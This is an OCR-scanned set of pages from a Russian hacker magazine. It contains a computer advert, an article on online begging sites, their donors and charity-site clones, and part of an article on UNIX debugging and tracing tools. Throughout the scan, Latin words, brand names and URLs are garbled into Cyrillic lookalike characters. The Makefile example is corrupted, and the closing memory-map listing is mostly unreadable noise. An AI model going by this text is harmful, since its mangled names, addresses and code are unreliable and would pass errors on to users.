Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Ьо^о, Соге Іпзісіе, Іпіеі, Іпіеі І_о§о, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе і-о^о, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории США и других стран. 



РЬЕХТКОИ 



Компьютеры гибкой конфигурации 



Вы привыкли получать то, что хотите? 
Вы мечтаете иметь нестандартный 
компьютер, который соответствовал 
бы всем Вашим представлениям? 



РІехігоп - это компьютер для меня 
Выбираю РІехігоп на базе 
Іпіеі® Соге™2 Оио. 



Единая справочная: (495) 105-64-47 



Реклама 











імірвіш 



цена 



ФЕНОМЕН СЕТЕВОГО ПОПРОШАЙНИЧЕСТВА 



почти каждый день мы сталкиваемся со всевозможными нищими 

И ПОПРОШАЙКАМИ. МЫ ПРИВЫКЛИ НЕ ОБРАЩАТЬ ВНИМАНИЯ НА ЭТИХ ЛЮДЕЙ, 
НЕ ЗАМЕЧАТЬ ИХ. НО ПОПРОШАЙНИЧЕСТВО — ОДНА ИЗ ДРЕВНЕЙШИХ ПРОФЕС- 
СИЙ, И ЭТИ НИЩИЕ ЗАЧАСТУЮ ЗАРАБАТЫВАЮТ БОЛЬШЕ, ЧЕМ ТЫ 
И Я ВМЕСТЕ ВЗЯТЫЕ. САМО СОБОЙ, МЕТОДЫ ВЫКАЧИВАНИЯ ДЕНЕГ ИЗ СОЧУВС- 
ТВУЮЩИХ НЕ СТОЯТ НА МЕСТЕ И ПОСТОЯННО СОВЕРШЕНСТВУЮТСЯ, ИДЯ В НОГУ 
СО ВРЕМЕНЕМ. НЕУДИВИТЕЛЬНО, ЧТО ПОПРОШАЙКИ ДОБРАЛИСЬ И ДО СЕТИ. 



ачать стоит с того, что феномен 
сетевого попрошайничества 
— явление совсем еще молодое. 
Назаре интернета кличи о помощи, конечно, 
тоже бросали, но такого размаха, как сегод- 
ня, не было. На широкую ногу этот «бизнес» 
поставили, когда в интернет повалили тол- 
пы сердобольных пользователей. Пальма 
первенства в сетевом попрошайничестве 
досталась американке Карин Боснек. Я не 
зря заметил, что Карин американка. Дело 
в том, что кибернищие — именно западное 
явление. Оттуда же к нам пришел и термин 
«суЬег-Ьеддагз» — киберпопрошайки или 
беггеры. Как обстоят дела с беггерством у 
нас, мы поговорим чуть позже, а пока вер- 
немся к Карин. 

Вряд ли именно Карин Боснек открыла са- 
мый первый веб-сайтс призывом «Помоги- 
те материально!». Просто именно она ста- 
ла первой, кто привлек к себе внимание 
СМИ, после чего беггер-сайты стали появ- 
ляться, как грибы после дождя. Началась 
настоящая эпидемия, породившая сотни 
интернет-нищих. 
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Все произошло в июне 2002 года, когда 
Карин обнаружила, что задолженность 
по ее кредитной карте составляет около 
$20,000. Она практически не следила за 
балансом, и, так как очень любила шопинг, 
результат не заставил себя ждать. На- 
ходчивая дама не растерялась и создала 
сайт ѵѵѵѵѵѵ.заѵекагѵп.сот (стоит заметить, 
что беггеры очень любят доменные имена 
со словами Гіеір, заѵе, зепб, рау и т. п.). Там 
оначестно просила о помощи под лозунгом 
«Кредитные карты — это зло!» и даже при- 
вела нехитрые вычисления: «Все, что мне 
нужно, — это собрать по $1 с 20,000 человек, 
или же по $2 с 10,000, или $5 с 4000... Ну, ты 
уловил идею. Всего 20 тысяч добрых людей 
— я забуду об этом долге, как о страшном 
сне!». Сайт был совсем простенький: стра- 
ничка без графики, сделанная «наколенке» 
за полчаса. Сама Карин признается, что 
идея создания сайта пришла ей в голову 
совершенно случайно, и уж конечно, она не 
ожидалатакого резонанса. 

О Карин писали газеты и журналы во 
всем мире, на ее сайте есть полный пе- 



речень изданий, который выглядит весь- 
ма внушительно. Есть там и ТИе Ыеѵѵ Ѵогк 
Тіпгіез, и Реоріе, и Тіте, и другие известные 
издания. Женщину не раз приглашали наТВ, 
брали интервью, она принимала участие во 
всевозможных ток-шоу и выступала на ра- 
дио. В результате этой шумихи за какие-то 
двадцать недель сайт Карин посетило более 
двух миллионов человек. Большую часть 
суммы ей пожертвовали, часть Карин доба- 
вила сама, и меньше чем через полгода она 
полностью погасила задолженность. 
Сейчас Карин почивает на лаврах и явно 
не испытывает недостатка в деньгах. Она 
пишет книги. На главной странице сайта 
красуется обложка уже второго романа 
под названием «20 Тітез а Бабу». А первой 
книгой, как легко догадаться, стала биогра- 
фическая «Заѵе Кагуп». Кстати, издана она 
более чем в 10-ти странах мира и вот-вот 
выйдет в России. Кроме аннотаций и обло- 
жек, на сайте приводятся отрывки из ревю 
таких изданий, как Созтороіііап, Магіе СІаге 
и ТНе ѴѴазбіпдіоп РозЕ 

Периодически Карин помогает другим бег- 
герам, причем не только добрым советом, 
но и рекламой. Сайт заѵекагѵп.сот — часто 
посещаемый ресурс, пропиариться на нем 
— залогуспеха. 

Видя стремительно развивающуюся сферу 
«бизнеса», Карин даже пытается предъ- 
являть авторские права на идею сетевого 
попрошайничества: «Кто-то берет мой сайт 
за точку отсчета и практически его копиру- 
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ѳт, наживаясь на этом. Это не что иное, как 
нарушение авторских прав», — заявляет 
Боснек. Однако, что бы госпожа Боснек ни 
говорила, маленький камешек давно пре- 
вратился в настоящую глыбу. 

К числу наиболее известных и успеш- 
ных беггерских сайтов принадлежит 
заѵекітЬегІѵ.сот . автором которого явля- 
ется Кимберли Смит, мать пятерых детей. 
Кимберли и ее второй муж просили денег на 
погашение долгов и покупку нового дома. 
Ни много ни мало $27 тысяч вечнозеленых 
президентов. Неизвестно, что так подкупи- 
ло аудиторию — возможно, обилие трога- 
тельных детских и семейных фотографий, 
но миссис Смит собрала аж $36 тысяч. «Так 
приятно осознавать, что людям не все рав- 
но!» — говорит миссис Смит. На сегодняш- 
ний день сайт прекратил свое существова- 
ние за ненадобностью. 

Натой же волне некая Мишель Хуан собра- 
ла более 3-х тысяч долларов на операцию 
по увеличению груди. Причем одно из по- 
жертвований составило сразу $1200. 

Пенни Хоукинс открыла сайт Неіртеіеаѵ 
етѵИизЬапсІ.сот . где, как понятно из назва- 
ния, просила помощи в разводе с мужем, от 
которого сильно зависела финансово. Что- 
бы бросить мужа со спокойной совестью, 
ей требовалось порядка $12 тысяч. Сайт 
приносил Пенни около $75 в неделю. Сей- 
час он уже не существует — сумма была 
собрана. 

Можно долго приводить примеры удачных 
беггер-сайтов, но ни один из них не дос- 
тиг бы успеха, не будь так называемых «до- 
норов» — людей, которые подают беггерам. 

О Доноры 

В статье, обозревающей явление киберпоп- 
рошаек, «Нью-Йорк Таймс» пишет о про- 
фессиональном «доноре» Элин Моллин. 
Это обычная женщина из Куинс, которая ис- 
пытывает почти физическую потребность 
кому-то помогать. Раньше она регулярно 
жертвоваладеньги Армии спасения, защит- 
никам животных и другим благотворитель- 
ным организациям, а теперь она открыла 
для себя сетевых попрошаек. Мисс Моллин 
говорит, что, жертвуя различным органи- 
зациям, она чувствует свою причастность 
к чему-то хорошему, осознает, что помога- 
ет улучшить качество жизни других людей 
— словом, приноситпользу. 

Когда Элин попала на сайт Кимберли Смит, 



то буквальноузналасвои собственные про- 
блемы — она тоже совсем недавно распла- 
чивалась за покупку дома, переживала все 
те же трудности. «Я почувствовала, что ее 
проблемы имеют ко мне самое прямое отно- 
шение», — сказала Элин и отдала Кимберли 
кровные $20. В своей точке зрения Элин не 
одинока. Многие люди, ранее отдававшие 
деньги всяческим фондам помощи, не чувс- 
твуют, переводя десять долларов на счет 
большой организации, своего участия в про- 
блеме. Скромная десятка просто теряется в 
денежных потоках, и появляются сомнения, 
дойдут ли деньги вообще до нуждающихся. 
Организациитипа «Красного креста» кажут- 
ся слишком большими, а их сфера деятель- 
ности — размытой и абстрактной. Неясно, 
чем и кому именно поможет эта десятка. В то 
время как на сайтах беггеров все просто: 
здесь «доноры» видят реальную проблему, 



реальных людей, а не абстрактно-статис- 
тических «голодающих детей из стран тре- 
тьего мира». 

Озабоченная проблемой спасенияживотных 
Сабрина ЛеКомп признается корреспонден- 
ту «Нью-Йорк Таймс»: «Эти фонды просто 
огромны, они пытаются спасти всех! Я хочу 
помочь всем этим животным, мне ужасно их 
жаль, и я хочу сделать что-то для всех сразу, 
но прекрасно понимаю, что это не в моих си- 
лах. Мой маленький взнос не принесет ника- 
кой пользы, и, сознавая это, я чувствую себя 
просто ужасно». В общем, мы имеем четкую 
тенденцию: люди гораздо охотнее расстают- 
ся с деньгами, когда нужно спасти зверуш- 
ку или помочь человеку, особенно когда его 
проблемы так похожи на собственные. Экс- 
перты и вовсе утверждают, что нет никакой 
новой волны или идеи, — есть проблемы в 
обществе, особенно у молодежи, которая 
и составляет львиную долю пользователей 
сети. По мнению специалистов, деньги, кото- 
рые сегодня перечисляют беггерам, должны 
были быть перечислены как раз серьезным 
организациям. А тот факт, что люди не заду- 
мываются о глобальном и откликаются на 
проблемы лишь тогда, когда эти проблемы 



знакомы им самим, называют совершенно 
новой, тотальной формой цинизма и эгоиз- 
ма. Еще эксперты утверждают, что все ус- 
пешные сетевые попрошайки — люди талан- 
тливые порой сразу в нескольких областях. 
Они прекрасно владеют пером и излагают 
свои истории, вызывая неподдельное учас- 
тие и жалость. Зачастую беггеры неплохо 
разбираются в психологии и сознательно 
давят на «болевые точки», заставляя людей 
увидеть себя в этих историях, понять, что от 
такого незастрахован никто. Сайты беггеров 
всегда максимально вежливы, политкоррек- 
тны, к посетителю обращаются, называя его 
добрым, хорошим человеком. Любят попро- 
шайки напомнить и про старинный принцип, 
что «Земля круглая»: сделаешь доброе дело, 
переведешь на счет кибернищего пару дол- 
ларов — и тебе, глядишь, воздастся. 

Почти все профессиональные инет-поп- 



рошайки активно общаются с посетите- 
лями. Например, ведут на сайтах блоги, в 
которых рассказывают о своем нелегком 
бытие и рапортуют о прогрессе сбора 
средств. Еще распространенный прием, 
призванный вызвать большее доверие, 
— публикация на сайте приватных сведе- 
ний о себе. То есть фотографий, адресов, 
телефонов или даже сканов документов, 
удостоверяющих личность. Вряд ли таким 
образом можно отличить обычного афе- 
риста от того, кто на самом деле нуждает- 
ся в помощи: в наш век можно подделать 
какие угодно бумаги и фотографии, да и 
всю прочую информацию. Впрочем, «до- 
норы» редко сомневаются в правдивос- 
ти информации, изложенной на сайтах 
беггеров, и, переводя деньги, свято ве- 
рят, что они пошли на благое дело. Ведь 
им так хочется сделать что-то хорошее, а 
беггер-сайты — это как раз благодатная 
почва, чтобы почувствовать себя добрым, 
щедрым и великодушным. 

О Обратная сторона 

Само собой, у этой медали есть обратная 
сторона. Во-первых, далеко не все проекты 
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успешны. Сайт нищего, как и любой другой, 
требует хорошей раскрутки, пролинковки 
в баннерных сетях, поисковиках и даже 
рекламы. Хотя большей частью беггеры 
одиночки, в этом деле они не прочь объеди- 
ниться для продвижения общего дела. Су- 
ществуюттакие ресурсы, как сѵЬегЬеа. 
сот . — комьюнити беггеров, созданное, 
чтобы удобнее было находить друг друга, 
прописываться в поисковых машинах и 
т. п. Аналогичные списки представлены 
на Ѵабоо! и Ооодіе. Такие ресурсы благо- 
приятны и для «доноров»: не нужно часами 
рыскать по сети в поисках, кого бы обла- 
годетельствовать — можно просто войти и 
выбрать себе подходящего нищего:). 

Ты спросишь, зачем беггерам связь друг с 
другом? Все просто. Кпримеру, вкачестве 
рекламного хода кибернищие часто жер- 
твуют друг другу. Да, вот такой парадокс. 
Переводят друг другу деньги и пишут об 
этом в гостевыхкнигах, «попутно» расска- 
зывая о своем беггер-проекте, с ссылкам и 
и прочим. К тому же за счет известных се- 
тевых нищих можно хорошо пропиарить- 
ся. Представь, что о твоем проекте упо- 
минает в своем блоге сама Карин Боснек. 
Это, естественно, подниметтебе посеща- 
емость и почти наверняка приведет пару 
«доноров». 

Для получения пожертвований беггеры стара- 
ются использовать как можно больше различ- 
ных систем электронных переводов. Самые 
традиционные — ѴѴеЬ-Мопеу, РауРаІ, чеки, 
обычные почтовые переводы. С кредитками 
беггеры стараются не связываться: запу- 



ганная кардингом публика шарахается от 
сайтов с просьбами о банковском перево- 
де, как от чумы. 

Сложно в цифрах определить, какой про- 
цент беггеров составляют мошенники, но он 
велик, в этом можно не сомневаться. Видов 
сетевого попрошайничества больше, чем 
кажется на первый взгляд. Попадаются от- 
кровенно шуточные сайты, где просят денег 
на покупку Хаммера, пишут, что хотят стать 
богаче Билла Гейтса, или торгуют свои те- 
лом, как студентШон Джерри. Насвоемсай- 
те Шон предложил всем желающим взять у 
него в аренду ту или иную часть тела сроком 
на полгода. Конечно, за деньги. Покупа- 
телю выписывался шуточный сертификат 
(недействительный с юридической точки 
зрения), а Шон получал деньги, которые 
шли в оплату его обучения. Словом, многие 
беггеры пытаются подходить к делу с выдум- 
кой и юмором, будь то сбор денег на фонд 
по борьбе с пришельцами или продажа ку- 
курузных хлопьев по $1,5 за штуку. 

С каждым днем попрошайничество в сети 
заинтересовывает все больше любителей 
халявы. За последний год появилось много 
беггеров с востока (Китай, Корея). В боль- 
шинстве своем эти ребята специализиру- 
ются на обычном спаме, рассылая тысячи 
слезливых писем с мольбами о помощи (ис- 
тории, кстати, постоянно меняются). Конеч- 
но, находятся те, кто письмам верит и пере- 
водит доллар-другой. 

Говоря о братьях-корейцах, не могу не упо- 
мянуть давно и хорошо отлаженный бизнес 
по попрошайничеству в онлайновых играх. 



Все, кто играл в мморпг, встречали там хо- 
тя бы раз одного попрошайку (хех, 80% мо- 
его игнор-листа в ѵѵогіб оі ѵѵагсгаіі занимают 
как раз эти перцы. — Прим. тіпсІѵѵОгк). За- 
частую в роли попрошайки выступают боты 

— специальные программы, повторяющие 
одну определенную модель поведения, при 
этом бот адекватно реагирует на попытку 
с ним заговорить, открывает окошко тор- 
говли, на случай если ему дадут монетку 

— в общем, не сразу распознается неиску- 
шенными пользователями. Тот факт, что 
игровые деньги почти из любой популярной 
мморпг можно обменять на деньги реаль- 
ные, — ни для кого не секрет. Конечно, это, 
мягко говоря, нелегально, но ни продавцов, 
ни покупателей это не останавливает. Да, 
попрошайничество в играх не достигает 
такого размаха, как, скажем, торговля ра- 
ритетными игровыми вещами или прокачка 
персонажей за деньги (и то и другое является 
очень прибыльным бизнесом), но факт су- 
ществования кибернищих даже в играх го- 
воритзасебя. 

О Русские беггеры 

Переходя ктеме беггерствав России, приведу 
еще один пример, связанный с играми. В рунете 
существуетмножествотакназываемыхфришар- 
дов(пиратских серверов) популярныхонлайно- 
вых игр. Держат эти сайты народные умельцы, 
способные из кошмарных ява-эмуляторов сде- 
лать игровые серверы. Едва ли не на каждом 
сайте таких проектов есть страничка, призыва- 
ющая игроков «безвозмездно помочь проекту». 
Объясняют нужду в деньгах, как правило, тем, 
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что серверам нужно новое «железо». За пожертвования не- 
редко презентуютвиртуальные подарки в виде денег и ар- 
тефактов. Только никакого железа и новых серверов не 
предвидится.А«дотации»,посути, — простозарплатаад- 
минов, и, можешь поверить, нажизнь им вполне хватает. 
Это при средней заполненности сервера в 1000- 
2000 человек и постоянной текучке игроков! 

Комизм ситуации состоит в том, что игроки, как и все 
«доноры», платящие беггерам, искренне верят, что 
сделали хорошо не только себе, но и своему серверу. 
Когда я штурмовал поисковые машины в надежде най- 
ти более тривиальных русских беггеров, меня ждало 
полное разочарование. Можно сказать, что беггеров в 
западном понимании этого термина у нас нет. Все, что 
мне удалось найти, — это буквально несколько стра- 
ничек на народ, ру и тому подобных хостингах, где весь 
текст ограничивался примерно такой формулировкой: 
«Привет! Мы подумали, что стоять с шапкой на улице в 
информационный век уже не актуально, поэтому реши- 
ли стать первыми в мире интернет-нищими. Пожалуйста, 
помогите нам, чем можете». Более интересные странич- 
ки, гдеслезно просят денегнаапгрейд компьютера или 
на подаяние виртуальному храму, ты найдешь в ссылках 
кэтой статье. Что забавно, почти все наши беггеры назы- 
вают себя «первыми русскими интернет-нищими». 

Не получив почти никакого результата от поискови- 
ков, я не поверил, что наши дотошные, любящие халя- 
ву сограждане еще не добрались до такой обширной 
сферы деятельности. И правильно одел ал. Мне все же 
удалось выяснить, что беггеры у нас существуют, но 
предпочитают работать в англоязычном сегменте ин- 
терета — там охотнее подают. Способы используют 
совершенно разные: часть беггеров зарабатывает 
на вымышленных историях, часть — на своего рода 
полуправде. В общем-то, наши ничем не отличаются 
от других попрошаек, и уверяют: в России беггерство 



^ сцена 




— почти бесполезное занятие. На мой вопрос «поче- 
му» следовал ответ: «Менталитет не тот». 
Действительно, нуждающиеся в средствах организа- 
ции представлены в рунете сайтами зоз.ги . сіеіі.тзк.ги и 
похожими ресурсами. Назвать это попрошайничеством 
не поворачивается язык. В основном здесь помогают 
смертельно или тяжело больным детям, ветеранам вой- 
ны, пожилым и одиноким людям, ищут доноров крови 
или органов. Сайты сделаны в виде досок объявлений, 
разделенныхнасоответствующиеразделы.Стоитотме- 
тить, что участие в этих проектах принимают больницы 
и социальные фонды. Рядом с этими сайтами просьбы 
подать напогашение долга, покупку компьютера и тому 
подобное выглядят бледно, смешно и несерьезно. 
Разумеется, не обходится и безлюдей, которые нажива- 
ются начужом горе. Галина Чаликова — вице-президент 
благотворительного фонда при Российской детской 
клинической больнице ( сіей.тзк.ги ) — прокомментиро- 
вала это так: «Первый раз мы столкнулись с мошенника- 
ми в 2000 году — я говорю о благотворительном фонде 
«Товит», который располагался по адресу: сІоЬго.іс.ги . 
Владельцы этого сайта просто брали информацию о 
детях, которые проходят лечение в РДКБ, и просили пе- 
речислить деньги на свой счет. А еще у нас в больнице 
лежал мальчик Ваня, которому мы искали опекунов. На 
сайте же «Товит» предлагалось усыновить Ваню, запла- 
тив «Товиту» $1 тысячу. С тех пор клоны нашего сайта 
появлялись регулярно. Последний пример — сочинский 
сайт кѵапігиз.сот.ги . Большинство историй больных де- 
тей на этом сайте взяты с нашего сайта». 

Как видишь, бизнес с модным названием «беггинг» рас- 
тет и процветает. Впрочем, я не советую тебе регистри- 
ровать новьій сайте именем пшбшшшюпеурішзашш 
и протягивать руку. Поверь, есть занятия интереснее и 
прибыльнее. А попрошайничеством пусть занимаются 
те, кто действительно нуждается в деньгах. НС 




> ГіНр://сѵЬегЬед.сот 

— коалиция сетевых 
нищих. 

ГіНр://ѵѵѵѵѵѵ.5аѵекагуп. 
сот — первая киберни- 
щая, а ныне писательни- 
ца, Карин Боснек. 
ИНр://ѵѵѵѵѵѵ.505.ги — пор- 
тал, где можно найти или 
предложить помощь. 
ГіНр://сІопа1е.Ьѵ.ги 

— виртуальный храм с 
виртуальным нищим. 
ГіПр://іеіипе.пагосІ.ги 

— очень лаконичный 
попрошайка. 
ГіНр://пІ5сГііѵ.пагосІ.ги 

— нищий компьютер- 
щик. 

ГіПр://сѵЬегЬеааег.пагосІ. 
ги/ипіоп. Гііті — сбор 
средств на апгрейд 
компьютера. 
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ИНСТРУМЕНТЫ ІШІХ ДЛЯ ХАКЕРОВ И ПРОГРАММИСТОВ 



ПОМНИШЬ ИЗРЕЧЕНИЕ «ЫІЧІХ ПРИДУМАЛИ ХАКЕРЫ»? САМОЕ ИНТЕРЕСНОЕ ЗАКЛЮЧАЕТСЯ В ТОМ, ЧТО ЭТО ВЫРАЖЕНИЕ 
ВСЕГО ТРЕМЯ СЛОВАМИ ОПИСЫВАЕТ СУЩНОСТЬ ВСЕЙ ОПЕРАЦИОННОЙ СИСТЕМЫ. ПЕРВОЕ ЕГО ЗНАЧЕНИЕ ГОВОРИТ 
НАМ, ЧТО КУЛЬТУРА ЫІЧІХ И ХАКЕРСКАЯ КУЛЬТУРА ВСЕГДА БЫЛИ ТЕСНО СВЯЗАНЫ. ВТОРОЕ, ЧТО ЫІЧІХ — ЭТО ОПЕРАЦИ- 
ОННАЯ СИСТЕМА, НАИБОЛЕЕ ПОЛНО ВПИТАВШАЯ В СЕБЯ ЧЕРТЫ ХАКЕРСКОГО ИНСТРУМЕНТАРИЯ. ОБ ЭТИХ ОСОБЕННО- 
СТЯХ ЫІЧІХ-ПОДОБНЫХ ОС МЫ СЕГОДНЯ И ПОГОВОРИМ. 



I ели углубиться в историю ЫІЧІХ, то 
можно заметить один интересный 
I I факт. На каждой из эволюцион- 

ных ступеней развития главным стимулом к 
разработке ОС был энтузиазм. Кен Томпсон, 
реализовавший первый ЫІЧІХ, был просто 
одержим своей ОС, молодые ребята из инсти- 
тута Беркли испытывали большой интерес к 
разработке АТ&Т и с удовольствием изучали и 
дорабатывали операционную систему, Линус 
Торвальдс объяснял причины создания Ыпих 
коротким словосочетанием «ѵіизЛоіЛип» («Во 
имя удовольствия»). Стимулом к созданию 
РгееВЗЭ послужили веете же симпатии кЬІІЧІХ 
и возможность получить удовольствие от ее 
совершенствования. 

ЫІЧІХ всегда была операционной системой 
«для своих». Таким людям не нужны краси- 

/ по 



вые интерфейсы и простые установщики 
— для них важен полный контроль над 
операционной системой и программным 
обеспечением, возможность отладки, 
трассировки, простота доработки и моди- 
фикации ОС. Позиционирование Ы N IX, 
как операционной системы для хакеров 
и программистов, привело к тому, что 
функциональность, необходимая для 
их комфортной жизни, стала неотъем- 
лемой частью ОС. 

Рассмотрим пример с РгееВЗЭ. Стандарт- 
ная поставка этой ОС (без дополнительного 
программного обеспечения, установлен- 
ного через порты) включает в себя все, что 
только может понадобиться программисту, 
исследователю или хакеру: 

1. Исходные тексты всей системы. 



2. Справочное руководство по всем систем- 
ным вызовам (второй раздел тап-страниц) и 
ядру (девятый раздел). 

3. Руководство по архитектуре ядра (агсб- 
ГапсІЬоок). 

4. Встроенный отладчик ядра. 

5. Виртуальная файловая система ргосіз, 
предоставляющая возможность получить 
информацию обо всех процессах, их адре- 
сах в памяти, загруженных библиотеках. 

6. Комплект из компилятора, отладчика, ас- 
семблера, дизассемблера. 

7. Системные вызовы кДасе(2) и рігасе(2) для 
трассировки процессов. 

8. Снифер/изг/зЬіп/ісрсІитр для отла- 
дки и исследования сетевых протоколов. 
Покажите мне еще одну не ІІІЧІХ-систему, 
обладающую таким солидным набором инс- 
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> В плап-странице ІсІ.зо прямо сказано, что предварительную 
загрузку библиотек можно использовать для перехвата 
вызовов функций 



трументария в стандартной поставке. И это 
далеко не полный перечень, а если принять 
во внимание еще и программы из портов, то 
совсем мизерный. 

По мере того как ІІІМ IX наступал на серверы и 
рабочие столы, администраторы и пользова- 
тели начали применятьэтотинструментарий 
в целях, далеких от программирования и ис- 
следования. Примером этого может служить 
хотя бытотфакт, что дляустановки програм- 
много обеспечения (пресловутая система 
портов) все ВЗО-системы и некоторые І_іпих- 
дистрибутивы используют инструментарий, 
изначально созданный для программистов. 

О ІІЫІХ глазами программиста 

Инструментарий программиста занимает 
прочные позиции в окружении ІІІМІХ. Мощ- 
ный скриптовый язык, встроенный в коман- 
дный интерпретатор, концепция каналов 
(рірез) и принцип «программа должна вы- 
полнять только одну функцию, но делать это 
очень хорошо» создали благодатную поч- 
ву для любительского программирования. 
Операционная система словно призывает 
тебя использовать богатый программист- 
ский функционал во всех областях деятель- 
ности. Многие администраторы и обычные 
пользователи применяют самопальные 
скрипты для выполнения сложных задач. 
Нет пользователя ІІІМІХ, который бы хоть 
раз в жизни не использовал каналы для об- 
работки потоков информации (чего только 
стоит команда «бтезд I Іезз»). Возможность 
комбинирования отдельных элементов опе- 
рационной системы для создания чего-т о 
нового является одной из основных причин 
жизнеспособности ОС. 



Но не одним только шеллом жив юниксоид. 
Существует множество других примеров 
использования инструментов из арсенала 
программиста в обыденной жизни. Одним 
из них является утилита /изг/Ьіп/таке, со- 
зданная для облегчения сборки программы 
из исходных текстов. Область ее примене- 
ния уже давно вышла за означенные выше 
рамки. Особенно ярко это выражено в сис- 
теме портов ВЗО-систем. Весь фреймворк, 
необходимый для выкачивания программы 
из сети, соблюдения зависимостей, поиска 
и выполнения множества других операций, 
написан именно на языке сценариев таке. 
И это вполне оправдано, если учитывать 
специфику синтаксиса плаке-файлов. Огед 
І_еІле, автор книги «ТИе Сотріеіе РгееВЗЭ», 
предложил использовать таке для созда- 
ния образов компакт-дисков: 



^^/п^сізо/МакеІіІе^Р;] 

РРЦР = «Ришту арріісаііоп» 
ВООТ = »-ЫІорріез/ЬооІ. II р» 
ІЗ^ЩѵаЩтр/ізоі^^^Я^Щ 

ѵои^^Т^еооо^^И 
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О ІІЫІХ глазами хакера 

Некоторые юниксоиды даже не подозре- 
вают о том, что многие компоненты ОС, ко- 
торые они привыкли использовать, изна- 
чально были созданы в целях облегчения 
отладки и исследования. В это легко пове- 
рить, если учитывать, насколько глубоко эти 



компоненты укоренились в ІІІМІХ. Возьмем, 
к примеру, виртуальную файловую систему 
ргосіз. Главная ее задача — предоставить 
информацию об исполняющихся процес- 
сах, ихокружении, адресахпамяти. Предпо- 
лагается, что пользователю все это знать не 
положено, но, тем не менее, опытные юник- 
соиды прибегают к помощи этой файловой 
системы. Ргосіз удобно использовать для 
выяснения причин аномального поведения 
программы или получения «снимка» ее ок- 
ружения в момент исполнения, что может по- 
надобитьсяприсоздании «песочниц» (читай 
мою статью «Под защитой песочного демо- 
на»). Более того, ргосіз стала настолько при- 
вычной для ІІІМІХ, что некоторые программы 
просто отказываются работать, обнаружив 
ее отсутствие. 

Такие утилиты, как /изг/Ьіп/ІсІсІ./изг/Ып/ 
зігасе, /изг/Ьіп/ІзоІ и /изг/Ьіп/ІзІа! (*В30), 
также находятся в одной целевой нише с 
файловой системой ргосіз. Их основное 
назначение — позволить программисту 
получить контроль над программой и ее 
исполнением. В то же время они стали 
просто панацеей для тех пользователей, 
кто задается вопросом «Почему эта про- 
грамма не работает?». Сколько раз ты 
применял команду «ІсІсІ 'ѵѵГі ісГі ргодгат'» 
после получения стандартной ошибки о 
ненайденных библиотеках? А ведь в кон- 
це тап-страницы к Ыпих-версии ІсІсІ ска- 
зано: «Ыпих Ргодгат тег 'з МапиаІ». Очень 
часто можно видеть, как трассировщик 
системных вызовов зігасе применяют для 
выяснения причин возникновения сбоя 
программы, и не программисты, а поль- 
зователи. Программы ІзоІ и Ізіаі — не ме- 



/іи 



ХАКЕР 10 /94/ 06 
















^ ипіхоісі 



гщр: □гоэсции-р/амьии г-кр ииииииш чі: ин 

шр: ьГсіШйй^ьМШйй Пм>: р МййШ» 

щр ^Гѵімгіп -і.^зісап №р і;7.л^№ ас оо 
Мир: ЬНЗШй-ЬМГіЛйй г-кр МШМИ «:07 
Нар: Ь^сГПЙОй-ьг^РдЙйО гѵлр (ИШ5МВ М:Й7 
ндр: *7*7айдд-&7е?ош г-<р идддм» рип? 
нлр- юг-?9идд-Р7й^пд — р мшмв 

Нар: Ь7гіаД(М-Ь7*МШ г-кр МШ№ ЙІ:й7 
н#р: І?г^шд-(.7^5сдд ™р ддшчр а?:д7 
н#: *г*Я0дд-&7и?7Ш гакр &т«Я5№0 д^дд 

Нар: ЬГсФйОО-ьТеИСйО г-кр ИШШ №1:47 
нар: ьвдмии-ьлйшии гѵкп шшлмп а?:и/ 
нлр: ^г^мдд Ь7(ь-.ддд г *р жддіда а?:д7 
№ф: Ь7«ЬШй-Ь7«Ь:Ш пир М0Ц5КВ &І:А7 
Нар: ЬВДМй-ЬННСОД г-кр ШШШ «:07 
нар: ЫГЯЖЛПП ЬГГМСПЙ гмр ЩП5БМЮ 03::П7 
Шр! ЬГГ&ИОО-ЬтиаО №р ОТШИО 44:00 



Нар 

ічар 



Ь7РЛ00й-Ьй-РЯС00 г-кр НЮйРНО 0-1:07 

ьртдапп-ытшпп плр ншпан» <н:пг 



нлр' е.ггг*іпд-р7ггмпд гѵ* р оттуда ар : дд 
Пар: ЬГНМОО-ЬГРмЛИО г-кр МИРНО «:07 
С.І 

нар: Ь7Гі»]аП-Ь7Г‘^СПа гѵѵр НП7ьНО '17:07 

Нар: ЬГММР-ІіНЪИМ г-кр МййиНй 43:07 
и^К&і^тсАТЫп 

Ннр ЫГЬМОО-ЬГГСМОО Г-Ір 000000» 0 ?» 07 
Нар: Ь7ММП-Ь7 ЛійИ плкр ИШНП 4І:07 
нар-: ЫтЬДШи Ь II е .: ас 0 й гикп Ы-ГЪЛКЮ 04: 00 

ідгеПпа нр - «увыіі мле. 

•■ • пѵ; гггмш)--гггто 



ігіы 

114® 

О 

11424 

І14Ж 

11441 

11441 

11441 

11441 

О 

114 № 
114 Я- 
УВД* 
1«44 
57440 
5744* 
О 

114 Н 
11451 
О 

12227 

ЮТ 

571И 

11422 

11422 

О 



у ііо/і івш-^. з. ч . м 

/ИЬЛШЛ-І-І-4.и 

СПИЧ} 

ЛіЬ/І1ЬгсиГЕйі.И.5.4 
/НЬ/Нйгк игмг. 50.5.4 
/ИМ 1*5-2- М.» 
/ІІЬ/11^-23 *.» 
/ИЬ/ИЬ=-2-і.4-м 
/11 р/П*>2-М.» 



СпИП> 

/ИЬ/ІІІ 



1 Иисц.сгг . 9а .2 .1 
/ІІЬ/ 1 1Ьгаі_«гг . м .2 .1 
ЛіМИ?теЛ%.».2.4 
/1 ІЬ/1 ІЬе*і_2Гѵы].. 2.4 
/ілг/1 1Ь ЛІЬьІ лгч . и .1.4.9 
/ыігЛ И711&5І зпд . » Д-4. д 
СПІЛ1> 

/ііЬ/ІІЬаіп.ае.І.Ів.* 

/І1Ь/1 ІЬэрт.ш. 1.13.0- 
СпіЛЦ 

/игг/1 1Ь Ліічі І Ь-2 .0 . м. 0 .И 
/и*гЛ ІЬЛІЬдІ Щ-3 .0 . д .ф 

/иіг/1 іЬ/'І-лаІ Е/ги_Ш_ЬЫ Йг/ 

/І-ІІІѵПО-г.3.4,50 

/1-іЬЛ4-2.3.4.і* 

СшсЮ 



Е/№ 0ЛГЗІГЧ і 



— р ооопомв со-;00 о 



[*йМІ 



